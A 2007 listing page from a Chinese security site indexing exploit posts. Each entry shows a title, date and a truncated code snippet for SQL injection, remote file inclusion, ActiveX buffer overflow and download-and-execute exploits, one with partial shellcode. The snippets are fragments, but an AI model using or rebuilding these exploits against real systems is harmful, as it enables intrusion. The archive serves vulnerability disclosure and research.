首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Jasmine CMS 1.0 SQL Injection/Remote Code Execution Exploit
  日期:2007-06-21 14:25:01 点击:77 评论:0
#!/usr/bin/php -q -d short_open_tag=on ?php error_reporting(0); ini_set(max_execution_time,0); ini_set(default_socket_timeout,5); if ($argc4) { print -------------------------------------------------------------------------rn; print Jasmine CMS 1.0
PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
  日期:2007-06-21 14:24:14 点击:183 评论:0
?php //PHP 5.2.3 tidy_parse_string() tidy_repair_string() local //buffer overflow poc (win) //rgod //site: retrogod.altervista.org //quickly tested on xp sp2, worked both from the cli and on apache //let's have a look here: http://www.google.com/code
Solar Empire <= 2.9.1.1 Blind SQL Injection / Hash Retrieve Exploit
  日期:2007-06-19 13:51:50 点击:72 评论:0
#!/usr/bin/php -q -d short_open_tag=on ? echo ------------------------------------------------------------------------ Solar Empire = 2.9.1.1 Blind SQL Injection / Hash Retrieve Exploit by BlackHawk hawkgotyou@gmail.com http://itablackhawk.altervista
MiniBB 2.0.5 (language) Local File Inclusion Exploit
  日期:2007-06-19 13:50:00 点击:83 评论:0
? /* \|/// \ - - // ( @ @ ) ----oOOo--(_)-oOOo--------------------------------------------------- [ Y! Underground Group ] [ Dj7xpl@yahoo.com ] [ Dj7xpl.2600.ir ] ----ooooO-----Ooooo-------------------------------------------------- ( ) ( ) ( )
PHP::HTML 0.6.4 (phphtml.php) Remote File Inclusion Vulnerability
  日期:2007-06-15 10:28:48 点击:114 评论:0
phphtml v 0.6.4 FOUND BY : o0xxdark0o Website: http://www.sitellite.org/ DOWNLOAD : http://sourceforge.net/projects/phphtml REMOTE FILE INCLUDE ############################################################ FILE : PATHphphtml.php #####################
Sitellite CMS <= 4.2.12 (559668.php) Remote File Inclusion Vulnerability
  日期:2007-06-15 10:28:14 点击:68 评论:0
*sitellite*http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz v 4.2.12 DORK : powered by Sitellite FOUND BY : o0xxdark0o o0xxdark0o[at]msn.com Website: http://www.sitellite.org/ DOWNLOAD : h
Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
  日期:2007-06-14 15:53:15 点击:55 评论:0
MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC Tested on full patched XP/SP2, IE7, MSO2003 html object id=ctl classid=clsid:{0002E55B-0000-0000-C000-000000000046}/object script language=javascript var b = 'AAAA'; while (b.length =
Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
  日期:2007-06-14 15:49:56 点击:85 评论:0
!-- 6.30 10/06/2007 Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512) / DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512) remote buffer overflow exploit/ xp sp2 version both dlls are vulnerable, this is the poc for the firs
Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
  日期:2007-06-14 15:41:41 点击:91 评论:0
!-- 01/06/2007 23.19.50 Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll) / DirectSpeechRecognition Module (Xlisten.dll) remote buffer overflow exploit / 2k sp4 seh version both the dlls are located in %SystemRoot%speech folder and they ar
Fuzzylime Forum 1.0 (low.php topic) Remote SQL Injection Exploit
  日期:2007-06-13 13:29:18 点击:74 评论:0
#!/usr/bin/perl -w ################################################################################# ## # Fuzzylime Forum 1.0 SQL Injection Exploit# ## # Discovered by: Silentz# # Payload: Admin Username Hash Retrieval# # Website: http://www.w4ck1ng.
Safari 3 for Windows Beta Remote Command Execution PoC
  日期:2007-06-13 13:28:14 点击:84 评论:0
!-- Safari for Windows, 0day exploit in 2 hours http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/ By Thor Larholm The below PoC exploit will exploit Safari by bouncing through Firefox via the Gopher protocol, passing on unfilt
TEC-IT TBarCode OCX ActiveX Remote Arbitrary File Overwrite Exploit
  日期:2007-06-13 13:27:14 点击:73 评论:0
pre codespan style=font: 10pt Courier New;span class=general1-symbol----------------------------------------------------------------------------------------------------------------- bTEC-IT TBarCode OCX ActiveX Control (TBarCode7.ocx v. 7.0.2.3524) S
Ace-FTP Client 1.24a Remote Buffer Overflow PoC
  日期:2007-06-12 12:48:12 点击:83 评论:0
#!/usr/bin/python ####################################################################### #Credit to n00b for finding the bug. #Ace-Ftp client buffer over flow p0c. #This is possible to exploit as we #Smash the seh handlers and there are #Plenty of r
Internet Download Accelerator 5.2 Remote Buffer Overflow PoC
  日期:2007-06-12 12:47:11 点击:92 评论:0
!--========================== ================================================== Internet Explorer ver 6.0 , 7.0 Tested On Winados SP2 DeltahackingSecurityTEAM Bug discovered by Dr.Pantagon Affected Software: idaiehlp.dll (IE 4.x-6.x BHO for Internet
PHP Real Estate Classifieds Remote File Inclusion Exploit
  日期:2007-06-12 12:46:14 点击:70 评论:0
html head meta http-equiv=Content-Type content=text/html; charset=windows-1254 titlePHP Real Estate Classifieds Premium Plus(header.php) Remote File Inclusion Exploit/title script language=JavaScript //================================================
e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit
  日期:2007-06-12 12:45:19 点击:80 评论:0
#!/usr/bin/php -q -d short_open_tag=on ?php /* Explanation: Bug #1 (admin/show_img.php): ################# # #?php # #$fp = fopen($_GET['img'], r); #$img = fread($fp, filesize($_GET['img'])); #fclose($fp); # #header(Content-type: .$_GET['type']); #ec
Yahoo! Messenger Webcam 8.1 (Ywcupl.dll) Download / Execute Exploit
  日期:2007-06-12 12:44:02 点击:109 评论:0
/* Compile in LCC-win32 (Free!) Download and exec any file you like! Have Fun! */ #include stdio.h #include string.h #include stdlib.h char *file = Click_here.html; FILE *fp = NULL; unsigned char sc[] = xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x5
Yahoo! Messenger Webcam 8.1 (Ywcvwr.dll) Download / Execute Exploit
  日期:2007-06-12 12:42:23 点击:91 评论:0
/* Compile in LCC-win32 (Free!) Download and exec any file you like! Have Fun! */ #include stdio.h #include string.h #include stdlib.h char *file = Click_here.html; FILE *fp = NULL; unsigned char sc[] = xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x5
MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
  日期:2007-06-12 12:41:20 点击:71 评论:0
#!/usr/bin/env ruby ################### #MoviePlay 4.76 .lst file Local buffer over-flow. #Credit to n00b for writing poc code..Pmsl #Tested on :Win xp sp2 eng. #Vendor web site: Netfarer.com MoviePlay 4.76 #Buffer-over flow reported : Jan 02 2007 12
Zenturi ProgramChecker ActiveX NavigateUrl() Insecure Method Exploit
  日期:2007-06-12 12:37:08 点击:64 评论:0
pre codespan style=font: 10pt Courier New;span class=general1-symbol----------------------------------------------------------------------------- bZenturi ProgramChecker ActiveX Control NavigateUrl() Insecure Method/b url: http://www.programchecker.c
共637页/12733条记录 首页 上一页 [547] [548] [549] 550 [551] [552] [553] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved